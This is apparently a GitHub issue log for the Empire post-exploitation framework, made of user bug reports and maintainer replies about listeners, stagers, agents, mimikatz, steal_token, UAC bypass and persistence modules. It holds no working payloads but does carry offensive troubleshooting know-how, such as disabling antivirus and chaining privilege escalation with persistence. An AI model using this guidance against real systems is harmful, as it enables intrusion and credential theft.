- Empire 3.3

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu 18.04 ; 20.04
- Python: Python3.8.2

**Describe the bug**
1) pip3 --version
pip 20.0.2 from /usr/lib/python3/dist-packages/pip (python 3.8)
2) Listener http(port 443)
3) Stager multi/launcher
The agent arrives and immediately "dies", but the powershell process continues to run on the target machine.

**

[2020-07-16 04:56] Hubbl3 commented on #258
@metasploitmsf is it fully staging? or just stage 0 checking in? If it's not fully staging then try running ```cert.sh``` from ```./Empire/setup```.

Otherwise try running with all AV disabled on the target machine and see if it works then. Your AV might be killing the agent

[2020-07-16 05:01] Hubbl3 commented on #256
Do you have a particular reason why your are concerned about the warning? It has been present in every version of Empire

![image](https://user-images.githubusercontent.com/42596432/87628751-40868180-c6f7-11ea-8572-19a615b63e6c.png)

[2020-07-17 01:38] Hubbl3 commented on #251
@ricko2991 That IIS7 image is what is supposed to come up when you access an agent without the proper authentication. The most likely issue is that your server key is mismatched to the listener you are trying to connect to. I will try and get a test set up in the next few days to see if I can reproduce the issue.

[2020-07-17 14:49] ricko2991 commented on #251
@Hubbl3 I try different way to use port forwading. But  always fail. I'm using meterpreter listener but fail and other different options didon't work in my case. How can i use port forwading and work with this?

[2020-07-19 03:54] #256 closed

[2020-07-19 03:57] #231 closed

[2020-07-19 04:00] #217 closed

[2020-07-19 04:03] Cx01N commented on #251
@ricko2991 It will be easier for us to walk through your setup on [discord](https://discord.com/invite/P8PZPyf). We aren't seeing an issue at the moment, but that may be because of different configurations. Please jump on and we can walk through the issue you are having, just message myself or @Hubbl3.
Thanks!

[2020-07-19 14:27] #251 closed

[2020-07-21 20:03] stormyordos commented on #230
So the explanation seems to be that the python code responsible for setting the "$customHeaders" variable in Start-Negotiate (listeners/http.py) tries to do two things at once : enabling multiple headers to be added to the requests, each one separated by a comma, and splitting each header by the colon character (as in "host:something.azureedge.net").
Unfortunately, it seems when there is only one

[2020-07-23 14:26] shelladdection opened #264 "[FEATURE REQUEST] Adding domain password spray script"
**Is your feature request related to a problem? Please describe.**
there is no password spray script to help finding password owners when you decrypt password from service as example

**Describe the solution you'd like**
adding this script
https://github.com/dafthack/DomainPasswordSpray

**Describe alternatives you've considered**
coudn't find any other than using it manually

**Additional context

[2020-08-01 13:33] metasploitmsf commented on #258
if I use Empire on Kali on a VPS (different hosters), then the error is...
<img width="591" alt="bug from kali on vps" src="https://user-images.githubusercontent.com/56875699/89102673-60d56200-d3c0-11ea-9e41-3e5c1ec0026b.png">

if I use Empire  Ubuntu 18.04,20.04 (different hosters), then the agent comes and immediately "dies"..
<img width="388" alt="bug from ubuntu(18 04,20 04) on vps" src="https

[2020-08-03 00:19] Cx01N commented on #258
@metasploitmsf It looks like your database is out-of-date since the functions table was added in a recent update. Try to run ```sudo ./empire --reset``` to reset it.

[2020-08-06 09:24] J0knK3ats opened #272 "[BUG]Error generating launcher: generate_launcher() got an unexpected keyword argument 'ETWBypass'"
**Empire Version**
- Empire 3.3.2

**OS Information (Linux flavor, Python version)**
- OS: kali 2020.3
- Python: python3.8.5

**Describe the bug**
cann't launcher a stager

**To Reproduce**

**Expected behavior**

**Screenshots**
![image](https://user-images.githubusercontent.com/46599554/89514776-ddc16b00-d808-11ea-903f-c75c4adf1f5e.png)
![image](https://user-images.githubusercontent.com/46599554

[2020-08-06 15:13] Cx01N commented on #272
@J0knK3ats Thanks for catching this! If you want to check it out, I pushed a PR to fix this issue.

[2020-08-07 04:32] #258 closed

[2020-08-07 20:02] BrandonIngalls opened #274 "[BUG] API Server Authentication Bypass"
**Empire Version**
- Empire 3.3.2

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu 18.04
- Python: 3.6.9

**Describe the bug**
It is possible to bypass the API server's authentication on a fresh install of Empire, where a user has not logged in yet.

Default `empire.db` admin user's api key gets set to an empty string here instead of a `null`:
https://github.com/BC-SECURITY/Empire/b

[2020-08-10 18:36] jeffmcjunkin opened #275 "[BUG] Discord link invalid"
**Empire Version**
N/A

**OS Information (Linux flavor, Python version)**
N/A

**Describe the bug**
The Discord link added in https://github.com/BC-SECURITY/Empire/commit/1390587a5967af025d1c42651b678c433b3f8a55 is no longer valid.

**To Reproduce**
Steps to reproduce the behavior:
1. Click on the Discord invite link from the above commit.
2. See https://github.com/BC-SECURITY/Empire/commit/139058

[2020-08-10 18:36] #275 closed

[2020-08-10 18:38] jeffmcjunkin opened #276 "[BUG] Discord Invite invalid"
**Empire Version**
- Empire 3.5

**OS Information (Linux flavor, Python version)**
- OS: Any
- Python: Any

**Describe the bug**
The Discord link added in 1390587 is no longer valid.

**To Reproduce**
Steps to reproduce the behavior:

1. Click on the Discord invite link from the above commit.
2. See 1390587#commitcomment-41346820

**Expected behavior**
Working invite to BC-SECURITY's Discord.

# S

[2020-08-10 22:06] Cx01N commented on #276
@jeffmcjunkin You are correct the old discord link in v3.3.0 is no longer valid. It was updated a few patches ago in the [readme](https://github.com/BC-SECURITY/Empire/blob/master/README.md) and should still work. If you are having issues this [discord link](https://discord.com/invite/P8PZPyf) should work also.

[2020-08-12 04:11] #276 closed

[2020-08-12 04:13] #274 closed

[2020-08-12 08:09] johnjohnsp1 opened #281 "preobfuscate: Could not read module source path at: Token\All\1"
## Empire Version
[Version] 3.3.3 BC-Security Fork | [Web] https://github.com/BC-SECURITY/Empire

## OS Information (Linux flavor, Python version)
Linux tstkali 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
using prebofuscate funct

[2020-08-12 11:12] #272 closed

[2020-08-18 04:34] #281 closed

[2020-08-27 04:44] br-sn opened #285 "[BUG] Invoke-SMBExec does not accept comma-separated list of computers"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.2
- Python: 3.8.2

**Describe the bug**
When using the Invoke-SMBexec module in the powershell > lateral_movement category, the ComputerName options says it allows a comma-separated list of Computers to target. When providing this list, it is not accepted:

[code]
As you can see, I have attempted t

[2020-08-27 04:44] #285 closed

[2020-08-27 04:47] br-sn opened #286 "[BUG] Invoke-SMBExec does not accept comma-separated list of computers"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.2
- Python: 3.8.2

**Describe the bug**
When using the Invoke-SMBexec module in the powershell > lateral_movement category, the ComputerName options says it allows a comma-separated list of Computers to target. When providing this list, it is not accepted:

[code]
As you can see, I have attempted t

[2020-08-29 07:48] pawp81 opened #288 "Saving Empire powershell module output to a file"
**Is your feature request related to a problem? Please describe.**
When running PowerShell module such as: privesc/powerup/allchecks I would like to save output to a file on attackers machine (or victims then I will download it) to review it offline.

**Describe the solution you'd like**
I would like export option of the output of privesc/powerup/allchecks to the .txt file either on attackers mach

[2020-08-29 07:48] #288 closed

[2020-08-29 07:49] pawp81 opened #289 "[FEATURE REQUEST] Saving Empire powershell module output to a file"
**Is your feature request related to a problem? Please describe.**
When running PowerShell module such as: privesc/powerup/allchecks I would like to save output to a file on attackers machine (or victims then I will download it) to review it offline.

**Describe the solution you'd like**
I would like export option of the output of privesc/powerup/allchecks to the .txt file either on attackers mach

[2020-08-30 17:25] Cx01N commented on #289
@pawp81 Have you tried looking at the logs in the download folder? The commands and outputs are saved for each agent and this seems to mostly meet the goal you want at least. If not, we could see about dropping a file to disk, but we try to avoid that at all costs obviously.

[2020-08-30 17:26] Cx01N commented on #289
@pawp81 I forgot to add, that [Starkiller ](https://github.com/BC-SECURITY/Starkiller) has a reporting tab that displays all of the commands and responses as well.

[2020-08-30 18:51] znre opened #290 "[BUG] privesc/ms16-032 fails to launch a new agent"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali GNU/Linux Rolling x86_64
- Python: Python 3.8.5

**Describe the bug**
When executing the "privesc/ms16-032" module (in my case, the target is hackthebox Optimum), the response is that it is successful and a SYSTEM shell has spawned, but nothing happening. There are no new agents that have spawned that h

[2020-08-30 18:51] #290 closed

[2020-08-30 18:53] znre opened #291 "[BUG] privesc/ms16-032 does not launch a new agent"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali GNU/Linux Rolling x86_64
- Python: Python 3.8.5

**Describe the bug**
When executing the "privesc/ms16-032" module (in my case, the target is hackthebox Optimum), the response is that it is successful and a SYSTEM shell has spawned, but nothing happening. There are no new agents that have spawned that h

[2020-08-30 19:53] Cx01N commented on #286
@br-sn The module isn't capable of doing multiple targets at once. I think saying Host[s] is a mistake and should be a single target. However, we are always accepting PRs if you want to update the PowerShell module.

![image](https://user-images.githubusercontent.com/20302208/91668146-19c1b600-eabf-11ea-9f2d-009751288f56.png)
![image](https://user-images.githubusercontent.com/20302208/91668199-c4d

[2020-08-31 03:03] Cx01N commented on #291
I fixed the issue, check out https://github.com/BC-SECURITY/Empire/pull/292 and just confirm that it works on your machine too.

[2020-08-31 05:00] pawp81 commented on #289
OK. I didn't know about downloads/agent_name/agent.log log file. Thank you.

[2020-08-31 05:00] #289 closed

[2020-08-31 05:07] znre commented on #291
It worked. Thank you so much!

[2020-09-03 16:28] n8tr0n opened #296 "Use of steal_token kills agent"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux
- Python: 3.8.5
**Describe the bug**
After using credentials\mimikatz\pth and then steal_token <pid>, the agent dies.

**To Reproduce**
Steps to reproduce the behavior:
1. Dump SAM
2. usemodule credentials\mimikatz\pth
3. steal_token <pid>
4. Agent dies

**Expected behavior**
I expect to be able t

[2020-09-03 16:28] #296 closed

[2020-09-03 16:30] n8tr0n opened #297 "[BUG] Steal_token crashes agent"
**Empire Version**
- Empire 3.3.4

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux
- Python: 3.8.5

**Describe the bug**
After using credentials\mimikatz\pth and then steal_token, the agent dies.

**To Reproduce**
1. Dump SAM
2. usemodule credentials\mimikatz\pth
3. steal_token
4. Agent dies
5. Expected behavior
6. I expect to be able to utilize the token to access targets that

[2020-09-07 15:05] Cx01N commented on #297
Steal_token (or Invoke-TokenManipulation) is having issues overall with newer Win 10 systems. It works on older builds, but I'm guessing that there will have to be some changes since it is crashing processes.

[2020-09-13 10:07] mattaereal commented on #132
Hey @Cx01N, I'm currently working on documenting your API. I will be finishing it in a few days probably.

Feel free to reach out if you want to. A peer review from your side will be awesome.

[2020-09-13 16:29] Cx01N commented on #132
@mattaereal That would be a huge help. I started updating the wiki, but got distracted with building some new Empire features. Thanks!

[2020-09-14 12:39] mattaereal commented on #132
Is there a way where we can talk more synchronously? Maybe twitter? @mattaereal is mine, feel free to pm me over there!

[2020-09-14 14:54] Cx01N commented on #132
@mattaereal sure, our discord would be the easiest way.
https://discord.com/invite/P8PZPyf

[2020-09-14 18:57] mattaereal commented on #132
Done! will ping you over there!

[2020-09-15 20:56] 5l1v3r1 opened #313 "[BUG] sqlite3 timestamp error"
**Empire Version**
- Empire 3.3.4-0kali1

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux 2020.4
- Python: 3.7

**Describe the bug**
A clear and concise description of what the bug is.

powershell-empire
[*] Loading stagers from: /usr/share/powershell-empire//lib/stagers/
[*] Loading modules from: /usr/share/powershell-empire//lib/modules/
[*] Loading listeners from: /usr/share/

[2020-09-15 20:56] #313 closed

[2020-09-16 01:10] Cx01N commented on #313
Try to run `sudo ./empire --reset` before starting the server again. Otherwise, we are happy to help on our [discord ](https://discord.com/invite/P8PZPyf) channel.

[2020-09-16 03:43] #9 closed

[2020-09-16 03:43] #198 closed

[2020-09-16 03:43] #291 closed

[2020-09-16 03:43] #286 closed

[2020-09-16 03:44] #264 closed

[2020-09-16 03:53] Hubbl3 commented on #199
@w1ld3r  This should be available now. It was fixed as part of this issue

https://github.com/BC-SECURITY/Empire/issues/198

if you want to do it. It would look like this `sudo ./empire -s multi/launcher -o Listener=http OutFile=launcher.txt` if you leave of the OutFile argument it will dump it to the CLI

[2020-09-16 03:53] #199 closed

[2020-09-19 18:31] Cx01N opened #315 "[BUG] New Template Test - Good"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.x

## OS Information (Linux flavor, Python version)
- OS:
- Python:

## Describe the bug
A clear and concise description of what the bug is.

## To Reproduce
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Sc

[2020-09-19 18:32] #315 closed

[2020-09-19 18:34] cx01n-test opened #316 "[BUG] New Template Test - Good"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.x

## OS Information (Linux flavor, Python version)
- OS:
- Python:

## Describe the bug
A clear and concise description of what the bug is.

## To Reproduce
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Sc

[2020-09-19 18:35] #316 closed

[2020-09-20 18:03] y1n07 opened #317 "[BUG] PowerShell process appears when i run a macro for word ( office 2019)"
## Empire Version

- Empire 3.3.4

## OS Information (Linux flavor, Python version)

- OS: parrot os
- Python: 3.8.5

## Describe the bug

a PowerShell process is shown when running the VBA for a few seconds while i execute a macro for windows ( in this case)

## To Reproduce

Steps to reproduce the behavior:

1. i created the macro for windows ( with the options of amsi bypass 1 & 2 , obfuscate a

[2020-09-20 18:11] y1n07 commented on #317
halp ;_;

[2020-09-20 18:50] Cx01N commented on #317
Please do not delete section headers in the future. I added the screenshot section back in and reopened the issue.

[2020-09-22 18:43] S3cur3Th1sSh1t opened #320 "[FEATURE REQUEST] Creds menu - add Hash"
## Is your feature request related to a problem? Please describe.
It´s not related to a problem.

## Describe the solution you'd like
As far as i know its only possible to add users to the creds database via username and password. It would be nice to have an option for username + NTLM Hash.

## Describe alternatives you've considered
Dump the hash via modules and it´s added to the DB.

## Addition

[2020-09-23 07:42] S3cur3Th1sSh1t commented on #320
I think i got it, it´s already implemented and new user+hash combinations can be loaded via

[code]

[2020-09-23 07:42] #320 closed

[2020-09-29 14:12] mjokic opened #322 "[BUG] Missing pyparsing module dependency in docker image"
## Empire Version
- Empire 3.4.0

## OS Information (Linux flavor, Python version)
- OS: /
- Python: /

## Describe the bug
Empire fails to start when running from docker image.

## To Reproduce
Steps to reproduce the behavior:
1. docker pull bcsecurity/empire:latest
2. docker run -it bcsecurity/empire:latest

## Expected behavior
Empire starts when "docker run -it bcsecurity/empire:latest" comman

[2020-09-29 23:27] microcreators opened #323 "[BUG] taskings w/o module_name column"
## Empire Version
- Empire 3.4

## OS Information (Linux flavor, Python version)
- OS: Kali Rolling (5.8.10)
- Python: 2.7.18

## Describe the bug
Any interaction with agents, like issuing shell commands or killing them, results in the red message as below and the screen goes back to the default, entry state after few seconds.
`[!] Exception: table taskings has no column named module_name`

## To

[2020-09-29 23:52] microcreators commented on #323
Purging and removing `empire.db` did the trick. I have no idea what went wrong in-between.

[2020-09-29 23:52] #323 closed

[2020-09-30 05:43] WhatIsRealityBro opened #325 "[BUG] DropBox(dbx) Listener Does Not Start"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.4.0

## OS Information (Linux flavor, Python version)
- OS: Kali Linux
- Python: 3.8.5

## Describe the bug
Whenever I attempt to start a DropBox(dbx) listener it either fails to start and shows a python error or says it has start

[2020-09-30 05:43] #325 closed

[2020-09-30 05:47] WhatIsRealityBro opened #326 "[BUG] DropBox/dbx Listener Does Not Start"
## Empire Version
- Empire 3.4.0

## OS Information (Linux flavor, Python version)
- OS: Kali Linux
- Python: 3.8.5

## Describe the bug
Whenever I attempt to start a DropBox/dbx listener it fails to start and shows a python error.

## To Reproduce
Steps to reproduce the behavior:
1. uselistener dbx
2. set APIToken (My DropBox App APIToken)
3. execute
4. Python Error:
[code]

## Expected behavior

[2020-10-01 05:14] Cx01N commented on #326
@WhatIsRealityBro Thanks for catching this! I opened a PR that should fix the issue. If you have a chance to test it, that would be awesome. I only tested the dropbox legacy API, so I am unsure if it will run with their newer one.

[2020-10-01 13:48] pawp81 opened #328 "[BUG] [!] Error parsing malleable profile: comfoo.profile, Profile::ingest - Invalid file: comfoo.profile"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.4

## OS Information (Linux flavor, Python version)
- OS: 5.5.0-kali1-amd64
- Python:  3.8.2

## Describe the bug
It is unclear where Malleable C2 profile should be placed for Empire listener to recognize it. I saved comfoo.profil

[2020-10-01 14:44] Cx01N commented on #328
The profiles do not need to be placed in any specific folder as long as they are set from the Malleable listener menu. The data/profiles folder is a legacy feature for the HTTP listener and I recommend storing them elsewhere (we may repurpose it for malleable profiles in the future).

The error you received appears to be a parser failure, which I'll check out and see what might be causing it. We a

[2020-10-01 14:49] pawp81 commented on #328
Moving the comfoo.profile to main Empire folder resolved the problem:

[code]

[2020-10-01 21:45] Cx01N commented on #328
Great! I'll take a look into what might have caused it but I'm glad it's working now. Let us know if you see anything else.

[2020-10-02 06:41] WhatIsRealityBro commented on #326
@Cx01N Thanks for the quick reply and fix! So it looks like the listener starts fine now but when I get an agent to check in I get the following error:

[code]

[2020-10-02 13:34] Cx01N commented on #326
Did you try running `sudo ./empire --reset` and starting the listener from a fresh instance? I just want to make sure we rule everything out first.

[2020-10-03 03:44] WhatIsRealityBro commented on #326
That's a handy command! To make sure nothing else is interfering I reinstalled all of Powershell Empire as well as ran the command you provided. This time I got a little further and got a slightly different error:
[code]

[2020-10-03 04:22] WhatIsRealityBro commented on #326
I tried adding the .encode('UTF-8') to the lines it's having trouble with but I still can't seem to get past that error - I might be doing it wrong though. I apologize if this is something trivial that's just going over my head!

[2020-10-03 06:58] Cx01N commented on #326
@WhatIsRealityBro good catch, not sure how I missed that. But, I updated the branch for #327 to include the fix. Cross our fingers that it works this time!

[2020-10-03 07:57] WhatIsRealityBro commented on #326
@Cx01N Works great! Thanks for all your help with this!

[2020-10-03 07:57] #326 closed

[2020-10-08 03:17] #328 closed

[2020-10-08 16:12] jtheanalytica opened #331 "[BUG] Error processing result packet from 'agent ID' : a bytes-like object is required, not 'str'"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.4.0

## OS Information (Linux flavor, Python version)
- OS:
**Oracle VM Virtual Box
Host: Windows 10 pro
VM1: Kali 2020.3
VM2: macOS Catalina Version 10.15.5**

- Python:
**Kali:**
python3 -V
Python 3.8.6

python -V
Python 2.7.18

[2020-10-09 09:05] jtheanalytica opened #334 "[FEATURE REQUEST] OSX Module persistence/osx/launchdaemonexecutable"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Is your feature request related to a problem? Please describe.

The following module does not exist any more:
persistence/osx/launchdaemonexecutable

The only modules that are available pertaining to OSX persistence are depicted in the screen shot provided

[2020-10-09 19:09] mlgualtieri commented on #297
Also ran in to this today running an agent on a Windows Server 2016 VM, so it seems like this might not be limited to Win10.

[2020-10-10 19:55] Hubbl3 commented on #317
@y1n07 this is not a bug. It's a condition of the launcher. There are stealthier options out there but we don't provide obfuscation support. It's simply just too often for any one method to work. If you have found a method that you like and would like help on where you could modify the Empire code to implement it please join the discord and ask there.

As this is not actually a bug I am closing th

[2020-10-10 19:55] #317 closed

[2020-10-13 07:46] AlphaBaller opened #344 "[BUG] Preobfuscating not working (empire//data/misc/Obfuscated.ps1)"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5

## OS Information (Linux flavor, Python version)
- OS: Ubuntu 20.04 with Docker
- Python: Docker Image

## Describe the bug
Preobfuscating fails with error [!] Exception: [Errno 2] No such file or directory: '/empire//data/misc

[2020-10-13 07:46] #344 closed

[2020-10-13 07:49] AlphaBaller opened #345 "[BUG] Preobfuscating not working [!] Exception: [Errno 2] No such file or directory: '/empire//data/misc/Obfuscated.ps1'"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5

## OS Information (Linux flavor, Python version)
- OS: Ubuntu 20.04 LTS
- Python: Docker Image

## Describe the bug
Command Preobfuscating Error [!] Exception: [Errno 2] No such file or directory: '/empire//data/misc/Obfuscated

[2020-10-13 13:18] phyushin opened #346 "you've got a typo in your most recent changelog"
# Please fill out one of the templates on: https://github.com/BC-SECURITY/Empire/issues/new/choose or the issue will be closed.
`Added powercat module - #319 (@xC01N) `I think should be (@Cx01n) as the rest of them are and the issue was fixed by (@Cx01n)

[2020-10-13 13:18] #346 closed

[2020-10-13 23:53] Cx01N commented on #345
At initial glance, it looks like the [obfuscated_module_directory](https://github.com/BC-SECURITY/Empire/tree/master/data/obfuscated_module_source) is being committed from the apt install in kali and the docker. I will look into it more tonight and see if we can come up with a quick solution.

[2020-10-14 04:00] #322 closed

[2020-10-15 00:23] #345 closed

[2020-10-15 09:23] eaglefn opened #352 "Agent crash using the Dropbox listener"
## Empire Version
- Empire 3.4

## OS Information (Linux flavor, Python version)
- OS: Ubuntu 18.04 LTS
- Python: 3.6

## Describe the bug
I installed the branch dropbox_fix and created a new listener (dbx). The first agent worked fine. The second agent crashed with the following error:

(Empire: stager/windows/launcher_bat) > [*] New agent T9Z7C15P checked in
[*] Uploading key negotiation part 2

[2020-10-15 09:23] #352 closed

[2020-10-15 09:26] eaglefn opened #353 "Agent crash using Dropbox listener"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.x

## OS Information (Linux flavor, Python version)
- OS:
- Python:

## Describe the bug
A clear and concise description of what the bug is.

## To Reproduce
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Sc

[2020-10-15 10:11] eaglefn opened #354 "Dropbox listener problem. agent crash!"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.4

## OS Information (Linux flavor, Python version)
- OS:  Ubuntu 18.04 LTS
- Python:  Python: 3.6

## Describe the bug
I installed the branch dropbox_fix and created a new listener (dbx). The first agent worked fine. The second a

[2020-10-15 14:25] Cx01N commented on #353
Closing since this looks like this is a duplicate of https://github.com/BC-SECURITY/Empire/issues/354and is missing information

[2020-10-15 14:25] #353 closed

[2020-10-15 22:50] Hubbl3 commented on #354
@eaglefn any branch outside of Master is dev branch and may not be stable. As such we can't really offer much help. If you are seeing the same behavior in the Master branch then please update us on that.

[2020-10-16 08:05] eaglefn commented on #354
Okay, thanks for the information.

I started again with a fresh installation in the same environment using Ubuntu 20.04. I used the official Master and it was working fine in the beginning. The first agent worked fine, but the second crashed with the following error:

(Empire: agents) > [*] New agent YFWME52R checked in
[*] Uploading key negotiation part 2 to /Empire/staging/YFWME52R_2.txt for YFW

[2020-10-16 20:35] mpgn opened #356 "[BUG] Mimikatz module does not start or never output anything"
## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: linux
- Python: 3.8

## Describe the bug
Mimikatz does not start when launching mimikatz module in elevated context

## To Reproduce
Steps to reproduce the behavior:
1. run mimikatz in elevate context

## Expected behavior
The module doesn't seem to launch

## Screenshots
![image](https://user-images.githubuse

[2020-10-16 20:40] Cx01N commented on #356
@mpgn what system are you targeting? Depending on the machine there may be something blocking it.

[2020-10-16 20:47] mpgn commented on #356
Windows 10 - 1908

![image](https://user-images.githubusercontent.com/5891788/96307224-8eb26600-1001-11eb-8779-238980146215.png)

Defender disabled, all options to disable

![image](https://user-images.githubusercontent.com/5891788/96307160-704c6a80-1001-11eb-9090-216af7c1c66e.png)

[2020-10-16 20:53] mpgn commented on #356
Running Invoke-Mimikatz.ps1 directly is working, so it's related to Empire

![image](https://user-images.githubusercontent.com/5891788/96307727-60815600-1002-11eb-9a66-599bf66d658a.png)

[2020-10-16 20:56] mpgn commented on #356
Ohhh big pardon, it's just taking a lot of time, like 20 min to get the output.

I rerun a new agents and it's working fast. My bad 👍

[2020-10-16 20:56] #356 closed

[2020-10-16 20:56] Cx01N commented on #356
@mpgn Can you share what listener, stager, and settings you are running. We are really are going to need some more info filled out in the ticket. Also, I am not sure if it's an Empire issue since I just tested it on a similar build.

![image](https://user-images.githubusercontent.com/20302208/96307906-35bde000-0fb7-11eb-9413-a62f740377ab.png)

[2020-10-16 21:01] Cx01N commented on #354
@eaglefn I cannot seem to recreate the issue. Can you try using Kali and see if the same issues are present?
Also, can you provide us with the target machines info, version, AV, and what setting you are using on your stager?

![image](https://user-images.githubusercontent.com/20302208/96308182-bed51700-0fb7-11eb-9d93-af9199cb07fc.png)

[2020-10-17 07:55] mikesimone opened #357 "[FEATURE REQUEST] Conditional Autoruns"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Is your feature request related to a problem? Please describe.
I am attempting to create a chain of events in an autorun, starting with bypassUAC, then getsystem, then registry persistence. Doesn't matter what I do, though; after the bypassUAC, no commands

[2020-10-17 12:37] mpgn opened #358 "[BUG] Invoke-PSRemoting block current agent"
## Empire Version
- Empire 3.x

## OS Information (Linux flavor, Python version)
- OS: linux
- Python: 2.7

## Describe the bug
Maybe not a bug, maybe yes.
When running Invoke-PSRemoting, a new agent pop and it's working fine. But the current agent is blocked and cannot be used unless the new agent is killed.
Is there any workaround for this so the first agent is not blocked waiting for the Invoke

[2020-10-17 12:37] #358 closed

[2020-10-17 12:39] mpgn opened #359 "[BUG] Invoke-PSRemoting block current agent"
## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: linux
- Python: 3.8

## Describe the bug
Maybe not a bug, maybe yes.
When running Invoke-PSRemoting, a new agent pop and it's working fine. But the current agent is blocked and cannot be used unless the new agent is killed.
Is there any workaround for this so the first agent is not blocked waiting for the Invo

[2020-10-17 13:52] eaglefn commented on #354
Okay, I installed the new version, but received the same error message.

================================================================================
 [Empire]  Post-Exploitation Framework
================================================================================
 [Version] 3.5.1 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
==============================================

[2020-10-17 14:37] Cx01N commented on #359
You need to be running empire in Python 3.
Also, can you please provide more information (Empire version, Listener, Stager, what lateral settings and target info)?

[2020-10-17 15:12] mpgn commented on #359
- http listener
- hta stagers

The agent is running on a windows 10 latest version. The module does work, but the inital agent is no responding after that.

The log show this when running the module

![image](https://user-images.githubusercontent.com/5891788/96346397-ec938c00-109b-11eb-9cde-110c17553258.png)

[2020-10-17 15:18] Cx01N commented on #354
It looks like something might be wrong on the dropbox side of things. Just to be safe, can you build a new dropbox application and have the file permissions set for read/write on metadata and content. Then restart the target machine to make sure there isn't an old agent running. If this doesn't work, I suggest jumping on our [discord](https://discord.com/invite/P8PZPyf), and we can walk through yo

[2020-10-17 15:20] mpgn commented on #359
I think I understand why.

- I had one agent (agent 1) and wanted to pop another agent so I did in the console `Start-Job { powershell xxxx }`
- From the new agent (agent 2) I run the Invoke-PSRemoting and maybe this is why it failed

Maybe there is a better to pop an agent from an initial agent, any idea ?

[2020-10-17 15:30] Cx01N commented on #357
I think I know the issue with the first part. Autorun is hanging on bypassuac since it is spawning a new agent and the function is really only built to handle a single agent. It is definitely a huge limitation on functionality. @Hubbl3 and I have talked about upgrading the autorun scripting a few times since it just executes the commands in the CLI.

I really like the direction you are suggesting

[2020-10-17 15:57] mpgn commented on #297
Ran also on this issue with a Windows 10

[2020-10-17 15:59] eaglefn commented on #354
Puuhh, That's it! Thanks for your help and patience. I started with a new APIToken!

<img width="1191" alt="Test" src="https://user-images.githubusercontent.com/64377595/96347519-75adc180-10a2-11eb-8c43-b0c90d184139.png">

[2020-10-17 15:59] #354 closed

[2020-10-17 16:34] mikesimone commented on #357
So, that AutoTTP looks pretty bad-ass! For the simple thing I'm going for (cards on table: I'm a sales engineer for an EDR vendor, and I just want to have an easy demo showing the people in my "how to use our product" class to learn how to find IoC's; I'm definitely not smart enough to do red teaming for a living), the Death Star link from the AutoTTP site might even work. I just need to figure ou

[2020-10-17 18:52] mikesimone commented on #357
Welp, looks like I'm dumber than I thought. I can't even figure out how to get started with AutoTTP. I'm'a keep trying to figure out how to get DeathStar to stop throwing these irritating "TypeError: 'NoneType' object is not iterable" errors.

[2020-10-17 21:08] mpgn opened #360 "[BUG] sqlite3.OperationalError: database is locked"
## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: kali
- Python: 3.8

## Describe the bug

[code]

## To Reproduce
...

## Expected behavior
A clear and concise description of what you expected to happen.

## Screenshots

![image](https://user-images.githubusercontent.com/5891788/96353541-65f7a280-10cd-11eb-9a2e-d610157f2321.png)
![image](https://user-images.

[2020-10-17 21:10] Cx01N commented on #357
Unfortunately both of those projects do not support Empire 3 and python 3. You'll have to build some custom stuff or find someone who has updated them. There is an updated version of deathstar available tho for @byt3bl33d3r’s sponsors.
https://github.com/byt3bl33d3r

[2020-10-17 21:58] Cx01N commented on #360
I recommend joining the discord and asking questions there since the 3 issues you have opened today appear to be configuration problems.
https://discord.com/invite/P8PZPyf

[2020-10-17 22:03] Hubbl3 commented on #297
There is now a pull request in that fixes this issue. There was a buffer size issue in the powershell code.

[2020-10-17 22:32] mpgn commented on #360
I don't really see how discord can help to this.
I use latest Kali and i've installed empire using the wiki.

I have 26 agents running at the same time.

[2020-10-18 16:17] Cx01N commented on #360
@mpgn I just felt bad that you were having so many problems, I figured it would have been easier to help you out live. But I'm glad you figured it out, I was trying to see if the number of agents was an issue but someone recently got up to 500+ without the database locking up.

[2020-10-20 03:41] mikesimone commented on #357
OK, so I've been trying to go it alone, and just write it in Powershell, 'cuz, well, I'm a masochist, and I like Windows. (I think I mentioned above that I'm also a salesguy, not an actual red-teamer, so understand that my skills are limited.)

Here's what I have so far.
